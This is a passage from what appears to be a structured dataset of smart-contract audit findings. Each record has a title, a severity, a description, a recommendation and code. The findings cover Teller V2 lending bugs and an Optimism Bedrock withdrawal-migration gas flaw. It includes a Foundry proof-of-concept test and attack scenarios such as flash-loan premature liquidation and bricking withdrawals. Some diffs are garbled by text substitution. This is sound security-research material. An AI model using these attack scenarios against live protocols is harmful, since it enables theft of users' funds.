that the market exists.чThis will lock any collateral forever since there's no way to retrieve it. For this to happen accidentally a borrower would have to create a bid for a non existing market with 0% APY though.\\nThis could also be used to lure lenders since the loan cannot be liquidated/defaulted. This might be difficult since the APY must be 0% for the bid to be created. Also, this will lock any collateral provided by the borrower forever.\\nDue to these circumstances I'm categorizing this as medium.ч```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n -last repayments are calculated incorrectly for \"irregular\" loan durationsчmediumчWhen taking a loan, a borrower expects that at the end of each payment cycle they should pay `paymentCycleAmount`. This is not true for loans that are not a multiple of `paymentCycle`.\\nImagine a loan of `1000` that is taken for 2.5 payment cycles (skip interest to keep calculations simple).\\nA borrower would expect to pay `400` + `400` + `200`\\nThis holds true for the first installment.\\nBut lets look at what happens at the second installment, here's the calculation of what is to pay in V2Calculations.sol:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n\\nSimplified the first calculation says `timeleft = loanDuration - (now - acceptedTimestamp)` and then if `timeleft < paymentCycle` we are within the last 
payment cycle.\\nThis isn't true for loan durations that aren't multiples of the payment cycles. This code says the last payment cycle is when you are one payment cycle from the end of the loan. Which is not the same as last payment cycle as my example above shows.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from \"@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol\";\\n\\nimport { AddressUpgradeable } from \"@openzeppelin/contracts-upgradeable/utils/AddressUpgradeable.sol\";\\n\\nimport { TellerV2 } from \"../contracts/TellerV2.sol\";\\nimport { Payment } from \"../contracts/TellerV2Storage.sol\";\\nimport { CollateralManager } from \"../contracts/CollateralManager.sol\";\\nimport { LenderCommitmentForwarder } from \"../contracts/LenderCommitmentForwarder.sol\";\\nimport { CollateralEscrowV1 } from \"../contracts/escrow/CollateralEscrowV1.sol\";\\nimport { Collateral, CollateralType } from \"../contracts/interfaces/escrow/ICollateralEscrowV1.sol\";\\n\\nimport { ReputationManagerMock } from \"../contracts/mock/ReputationManagerMock.sol\";\\nimport { LenderManagerMock } from \"../contracts/mock/LenderManagerMock.sol\";\\nimport { MarketRegistryMock } from \"../contracts/mock/MarketRegistryMock.sol\";\\n\\nimport {TestERC20Token} from \"./tokens/TestERC20Token.sol\";\\n\\nimport \"lib/forge-std/src/Test.sol\";\\n\\ncontract LoansTest is Test {\\n using AddressUpgradeable for address;\\n\\n MarketRegistryMock marketRegistry;\\n\\n TellerV2 tellerV2;\\n LenderCommitmentForwarder lenderCommitmentForwarder;\\n CollateralManager collateralManager;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n\\n uint256 marketId = 0;\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistryMock();\\n\\n lenderCommitmentForwarder = new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n \\n collateralManager = 
new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))), address(tellerV2));\\n\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder), address(collateralManager), lm);\\n\\n marketRegistry.setMarketOwner(address(this));\\n marketRegistry.setMarketFeeRecipient(address(this));\\n\\n tellerV2.setTrustedMarketForwarder(marketId,address(lenderCommitmentForwarder));\\n\\n principalToken = new TestERC20Token(\"Principal Token\", \"PRIN\", 12e18, 18);\\n }\\n\\n\\n function testLoanInstallmentsCalculatedIncorrectly() public {\\n // payment cycle is 1000 in market registry\\n \\n uint256 amount = 1000;\\n principalToken.transfer(alice,amount);\\n \\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),2*amount);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n marketId,\\n amount,\\n 2500, // 2.5 payment cycles\\n 0, // 0 interest to make calculations easier\\n \"\",\\n alice\\n );\\n tellerV2.lenderAcceptBid(bidId);\\n vm.stopPrank();\\n\\n // jump to first payment cycle end\\n vm.warp(block.timestamp + 1000);\\n Payment memory p = tellerV2.calculateAmountDue(bidId);\\n assertEq(400,p.principal);\\n\\n // borrower pays on time\\n vm.prank(alice);\\n tellerV2.repayLoanMinimum(bidId);\\n\\n // jump to second payment cycle\\n vm.warp(block.timestamp + 1000);\\n p = tellerV2.calculateAmountDue(bidId);\\n\\n // should be 400 but is full loan\\n assertEq(600,p.principal);\\n }\\n}\\n```\\n\\nThe details of this finding are out of scope but since it makes `TellerV2`, in scope, behave unexpectedly I believe this finding to be in scope.чFirst I thought that you could remove the `lastPaymentCycle` calculation all together. 
I tried that and then also tested what happened with \"irregular\" loans with interest.\\nThen I found this in the EMI calculation:\\n```\\nFile: libraries/NumbersLib.sol\\n\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n```\\n\\nEMI, which is designed for mortgages, assumes the payments is a discrete number of the same amortization essentially. I.e they don't allow \"partial\" periods at the end, because that doesn't make sense for a mortgage.\\nIn Teller this is allowed which causes some issues with the EMI calculation since the above row will always round up to a full number of payment periods. If you also count interest, which triggers the EMI calculation: The lender, in an \"irregular\" loan duration, would get less per installment up to the last one which would be bigger. The funds would all be paid with the correct interest in the end just not in the expected amounts.\\nMy recommendation now is:\\neither\\ndon't allow loan durations that aren't a multiple of the period, at least warn about it UI-wise, no one will lose any money but the installments might be split in unexpected amounts.\\nDo away with EMI all together as DeFi loans aren't the same as mortgages. The defaulting/liquidation logic only cares about time since last payment.\\nDo more math to make EMI work with irregular loan durations. This nerd sniped me:\\nMore math:\\nIn the middle we have an equation which describes the owed amount at a time $P_n$:\\n$$P_n=Pt^n-E\\frac{(t^n-1)}{t-n}$$ where $t=1+r$ and $r$ is the monthly interest rate ($apy*C/year$).\\nNow, from here, we want to calculate the loan at a time $P_{n + \\Delta}$:\\n$$P_{n + \\Delta}=Pt^nt_\\Delta-E\\frac{t^n-1}{t-1}t_\\Delta-kE$$\\nWhere $k$ is $c/C$ i.e. 
the ratio of partial cycle compared to a full cycle.\\nSame with $t_\\Delta$ which is $1+r_\\Delta$, ($r_\\Delta$ is also equal to $kr$, ratio of partial cycle rate to full cycle rate, which we'll use later).\\nReorganize to get $E$ from above:\\n$$ E = P r \\frac{t^nt_\\Delta}{t_\\Delta \\frac{t^n-1}{t-1} + k} $$\\nNow substitute in $1+r$ in place of $t$ and $1+r_\\Delta$ instead of $t_\\Delta$ and multiply both numerator and denominator with $r$:\\n$$ E = P \\frac{r (1+r)^n(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + kr} $$\\nand $kr = r_\\Delta$ gives us:\\n$$ E = P r (1+r)^n \\frac{(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + r_\\Delta} $$\\nTo check that this is correct, $r_\\Delta = 0$ (no extra cycle added) should give us the regular EMI equation. Which we can see is true for the above. And $r_\\Delta = r$ (a full extra cycle added) should give us the EMI equation but with $n+1$ which we can also see it does.\\nHere are the code changes to use this, together with changes to `V2Calculations.sol` to calculate the last period correctly:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\nindex 1cce8da..1ad5bcf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n@@ // Remove the line below\\n90,30 // Add the line below\\n90,15 @@ library V2Calculations {\\n uint256 owedTime = _timestamp // Remove the line below\\n 
uint256(_lastRepaidTimestamp);\\n interest_ = (interestOwedInAYear * owedTime) / daysInYear;\\n \\n// Remove the line below\\n // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n// Remove the line below\\n int256 durationLeftOnLoan = int256(\\n// Remove the line below\\n uint256(_bid.loanDetails.loanDuration)\\n// Remove the line below\\n ) // Remove the line below\\n\\n// Remove the line below\\n (int256(_timestamp) // Remove the line below\\n\\n// Remove the line below\\n int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n// Remove the line below\\n bool isLastPaymentCycle = durationLeftOnLoan <\\n// Remove the line below\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n// Remove the line below\\n owedPrincipal_ // Add the line below\\n interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n// Remove the line below\\n\\n if (_bid.paymentType == PaymentType.Bullet) {\\n// Remove the line below\\n if (isLastPaymentCycle) {\\n// Remove the line below\\n duePrincipal_ = owedPrincipal_;\\n// Remove the line below\\n }\\n// Add the line below\\n duePrincipal_ = owedPrincipal_;\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? 
owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n \\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Add the line below\\n uint256 owedAmount = (_bid.terms.paymentCycleAmount * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\n\\nAnd then NumbersLib.sol:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\nindex f34dd9c..8ca48bc 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n@@ // Remove the line below\\n120,7 // Add the line below\\n120,8 @@ library NumbersLib {\\n );\\n \\n // Number of payment cycles for the duration of the loan\\n// Remove the line below\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n// Add the line below\\n uint256 n = loanDuration/ cycleDuration;\\n// Add the line below\\n uint256 rest = loanDuration%cycleDuration;\\n \\n uint256 one = WadRayMath.wad();\\n uint256 r = WadRayMath.pctToWad(apr).wadMul(cycleDuration).wadDiv(\\n@@ // Remove the line below\\n128,8 // Add the line below\\n129,16 @@ library NumbersLib {\\n );\\n uint256 exp = (one // Add the line below\\n r).wadPow(n);\\n uint256 numerator = principal.wadMul(r).wadMul(exp);\\n// 
Remove the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n \\n// Remove the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n if(rest==0) {\\n// Add the line below\\n // duration is multiple of cycle\\n// Add the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n// Add the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n }\\n// Add the line below\\n // duration is an uneven cycle\\n// Add the line below\\n uint256 rDelta = WadRayMath.pctToWad(apr).wadMul(rest).wadDiv(daysInYear);\\n// Add the line below\\n uint256 n1 = numerator.wadMul(one // Add the line below\\n rDelta);\\n// Add the line below\\n uint256 denom = ((one // Add the line below\\n rDelta).wadMul(exp // Remove the line below\\n one)) // Add the line below\\n rDelta;\\n// Add the line below\\n return n1.wadDiv(denom);\\n }\\n }\\n```\\nчA borrower taking a loan might not be able to pay the last payment cycle and be liquidated. At the worst possible time since they've paid the whole loan on schedule up to the last installment. The liquidator just need to pay the last installment to take the whole collateral.\\nThis requires the loan to not be a multiple of the payment cycle which might sound odd. 
But since a year is 365 days and a common payment cycle is 30 days I imagine there can be quite a lot of loans that after 360 days will end up in this issue.\\nThere is also nothing stopping an unknowing borrower from placing a bid or accepting a commitment with an odd duration.ч```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n -setLenderManager may cause some Lenders to lose their assetsчmediumчIf the contract's lenderManager changes, repaid assets will be sent to the old lenderManager\\nsetLenderManager is used to change the lenderManager address of the contract\\n```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n \"LenderManager must be a contract\"\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n\\nclaimLoanNFT will change the bid.lender to the current lenderManager\\n```\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, \"claimLoanNFT\")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, \"only lender can claim NFT\");\\n // mint an NFT with the lender manager\\n 
lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n bid.lender = address(lenderManager);\\n }\\n```\\n\\nIn getLoanLender, if the bid.lender is the current lenderManager, the owner of the NFT will be returned as the lender, and the repaid assets will be sent to the lender.\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n// rest of code\\n address lender = getLoanLender(_bidId);\\n\\n // Send payment to the lender\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n```\\n\\nIf setLenderManager is called to change the lenderManager, in getLoanLender, since the bid.lender is not the current lenderManager, the old lenderManager address will be returned as the lender, and the repaid assets will be sent to the old lenderManager, resulting in the loss of the lender's assetsчConsider using MAGIC_NUMBER as bid.lender in claimLoanNFT and using that MAGIC_NUMBER in getLoanLender to do the comparison.\\n```\\n// Add the line below\\n address MAGIC_NUMBER = 0x// rest of code;\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, \"claimLoanNFT\")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, \"only lender can claim NFT\");\\n // mint an NFT with the lender manager\\n lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n// Remove the line below\\n bid.lender = address(lenderManager);\\n// Add the line below\\n bid.lender = MAGIC_NUMBER;\\n }\\n// rest of code\\n function 
getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n// Remove the line below\\n if (lender_ == address(lenderManager)) {\\n// Add the line below\\n if (lender_ == MAGIC_NUMBER) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\nчIt may cause some Lenders to lose their assetsч```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n \"LenderManager must be a contract\"\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n -A borrower/lender or liquidator will fail to withdraw the collateral assets due to reaching a gas limitчmediumчWithin the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to some bad scenarios like this due to reaching gas limit:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.\\n```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n\\n```\\n /**\\n * Since collateralInfo is mapped (address assetAddress => Collateral) that means\\n * that only a single tokenId per nft per loan can be collateralized.\\n * Ex. 
Two bored apes cannot be used as collateral for a single loan.\\n */\\n struct CollateralInfo {\\n EnumerableSetUpgradeable.AddressSet collateralAddresses;\\n mapping(address => Collateral) collateralInfo;\\n }\\n```\\n\\n```\\n // bidIds -> validated collateral info\\n mapping(uint256 => CollateralInfo) internal _bidCollaterals;\\n```\\n\\n```\\n function submitBid(\\n address _lendingToken,\\n uint256 _marketplaceId,\\n uint256 _principal,\\n uint32 _duration,\\n uint16 _APR,\\n string calldata _metadataURI,\\n address _receiver,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public override whenNotPaused returns (uint256 bidId_) {\\n // rest of code\\n bool validation = collateralManager.commitCollateral(\\n bidId_,\\n _collateralInfo /// @audit \\n );\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's multiple collateral balances and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral assets.\\n * @return validation_ Boolean indicating if the collateral balances were validated.\\n */\\n function commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo);\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) { \\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info); /// @audit\\n }\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's collateral balance and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral asset.\\n */\\n function _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n ) internal virtual {\\n CollateralInfo storage collateral = 
_bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; /// @audit\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId)); /// @audit \\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); /// @audit \\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Sends the deposited collateral to a liquidator of a bid.\\n * @notice Can only be called by the protocol.\\n * @param _bidId The id of the liquidated bid.\\n * @param _liquidatorAddress The address of the liquidator to send the collateral to.\\n */\\n function liquidateCollateral(uint256 _bidId, address _liquidatorAddress)\\n external\\n onlyTellerV2\\n {\\n if (isBidCollateralBacked(_bidId)) {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n require(\\n bidState == BidState.LIQUIDATED,\\n \"Loan has not been liquidated\"\\n );\\n _withdraw(_bidId, _liquidatorAddress); /// @audit\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Withdraws collateral to a given receiver's address.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n * @param _receiver The address to withdraw the collateral to.\\n */\\n function _withdraw(uint256 _bidId, address _receiver) internal virtual {\\n for (\\n uint256 i;\\n i < _bidCollaterals[_bidId].collateralAddresses.length(); /// @audit\\n i++\\n ) {\\n // Get collateral info\\n Collateral storage collateralInfo = _bidCollaterals[_bidId]\\n .collateralInfo[\\n _bidCollaterals[_bidId].collateralAddresses.at(i)\\n ];\\n // Withdraw 
collateral from escrow and send it to bid lender\\n ICollateralEscrowV1(_escrows[_bidId]).withdraw( /// @audit\\n collateralInfo._collateralAddress,\\n collateralInfo._amount,\\n _receiver\\n );\\n```\\n\\nHowever, within the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to a bad scenario like below:\\n① A borrower assign too many number of the collateral assets (ERC20/ERC721/ERC1155) into the `_collateralInfo` array parameter when the borrower call the TellerV2#submitBid() to submit a bid.\\n② Then, a lender accepts the bid via calling the TellerV2#lenderAcceptBid()\\n③ Then, a borrower or a lender try to withdraw the collateral, which is not liquidated, by calling the CollateralManager#withdraw(). Or, a liquidator try to withdraw the collateral, which is liquidated, by calling the CollateralManager#liquidateCollateral()\\n④ But, the transaction of the CollateralManager#withdraw() or the CollateralManager#liquidateCollateral() will be reverted in the for-loop of the CollateralManager#_withdraw() because that transaction will reach a gas limit.чWithin the TellerV2#submitBid(), consider adding a limitation about how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.чDue to reaching gas limit, some bad scenarios would occur like this:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.ч```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n -Premature Liquidation When a Borrower Pays earlyчmediumчOn TellerV2 markets, whenever a borrower pays early in one payment cycle, they could be at risk to be liquidated in the next payment cycle. 
And this is due to a vulnerability in the liquidation logic implemented in `_canLiquidateLoan`. Note: This issue is submitted separately from issue #2 because the exploit is based on user behaviors regardless of a specific market setting. And the vulnerability might warrant a change in the liquidation logic.\\nIn TellerV2.sol, the sole liquidation logic is dependent on the time gap between now and the previous payment timestamp. But a user might decide to pay at any time within a given payment cycle, which makes the time gap unreliable and effectively renders this logic vulnerable to exploitation.\\n```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n\\nSuppose a scenario where a user takes on a loan on a market with 3 days payment cycle and 3 days paymentDefaultDuration. And the loan is 14 days in duration. The user decided to make the first minimal payment an hour after receiving the loan, and the next payment due date is after the sixth day. Now 5 days passed since the user made the first payment, and a liquidator comes in and liquidates the loan and claims the collateral before the second payment is due.\\nHere is a test to show proof of concept for this scenario.чConsider using the current timestamp - previous payment due date instead of just `lastRepaidTimestamp` in the liquidation check logic. Also, add the check to see whether a user is late on a payment in `_canLiquidateLoan`.чGiven the fact that this vulnerability is not market specific and that users can pay freely during a payment cycle, it's quite easy for a liquidator to liquidate loans prematurely. And the effect might be across multiple markets.\\nWhen there are proportional collaterals, the exploit can be low cost. An attacker could take on flash loans to pay off the principal and interest, and the interest could be low when early in the loan duration. 
The attacker would then sell the collateral received in the same transaction to pay off flash loans and walk away with profits.ч```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n -All migrated withdrarwals that require more than 135,175 gas may be brickedчhighчMigrated withdrawals are given an \"outer\" (Portal) gas limit of `calldata cost + 200,000`, and an \"inner\" (CrossDomainMessenger) gas limit of `0`. The assumption is that the CrossDomainMessenger is replayable, so there is no need to specify a correct gas limit.\\nThis is an incorect assumption. For any withdrawals that require more than 135,175 gas, insufficient gas can be sent such that CrossDomainMessenger's external call reverts and the remaining 1/64th of the gas sent is not enough for replayability to be encoded in the Cross Domain Messenger.\\nHowever, the remaining 1/64th of gas in the Portal is sufficient to have the transaction finalize, so that the Portal will not process the withdrawal again.\\nWhen old withdrawals are migrated to Bedrock, they are encoded as calls to `L1CrossDomainMessenger.relayMessage()` as follows:\\n```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. 
Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs we can see, the `relayMessage()` call uses a gasLimit of zero (see comments above), while the outer gas limit is calculated by the `MigrateWithdrawalGasLimit()` function:\\n```\\nfunc MigrateWithdrawalGasLimit(data []byte) uint64 {\\n // Compute the cost of the calldata\\n dataCost := uint64(0)\\n for _, b := range data {\\n if b == 0 {\\n dataCost += params.TxDataZeroGas\\n } else {\\n dataCost += params.TxDataNonZeroGasEIP2028\\n }\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := dataCost + 200_000\\n // Cap the gas limit to be 25 million to prevent creating withdrawals\\n // that go over the block gas limit.\\n if gasLimit > 25_000_000 {\\n gasLimit = 25_000_000\\n }\\n\\n return gasLimit\\n}\\n```\\n\\nThis calculates the outer gas limit value by adding the calldata cost to 200,000.\\nLet's move over to the scenario in which these values are used to see why they can cause a problem.\\nWhen a transaction is proven, we can call `OptimismPortal.finalizeWithdrawalTransaction()` to execute the transaction. 
In the case of migrated withdrawals, this executes the following flow:\\n`OptimismPortal` calls to `L1CrossDomainMessenger` with a gas limit of `200,000 + calldata`\\nThis guarantees remaining gas for continued execution after the call of `(200_000 + calldata) * 64/63 * 1/64 > 3174`\\nXDM uses `41,002` gas before making the call, leaving `158,998` remaining for the call\\nThe `SafeCall.callWithMinGas()` succeeds, since the inner gas limit is set to 0\\nIf the call uses up all of the avaialble gas (succeeding or reverting), we are left with `158,998` * 1/64 = 2,484 for the remaining execution\\nThe remaining execution includes multiple SSTOREs which totals `23,823` gas, resulting in an OutOfGas revert\\nIn fact, if the call uses any amount greater than `135,175`, we will have less than `23,823` gas remaining and will revert\\nAs a result, none of the updates to `L1CrossDomainMessenger` occur, and the transaction is not marked in `failedMessages` for replayability\\nHowever, the remaining `3174` gas is sufficient to complete the transction on the `OptimismPortal`, which sets `finalizedWithdrawals[hash] = true` and locks the withdrawals from ever being made againчThere doesn't seem to be an easy fix for this, except to adjust the migration process so that migrated withdrawals are directly saved as `failedMessages` on the `L1CrossDomainMessenger` (and marked as `finalizedWithdrawals` on the OptimismPortal), rather than needing to be reproven through the normal flow.чAny migrated withdrawal that uses more than `135,175` gas will be bricked if insufficient gas is sent. 
This could be done by a malicious attacker bricking thousands of pending withdrawals or, more likely, could happen to users who accidentally executed their withdrawal with too little gas and ended up losing it permanently.ч```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS 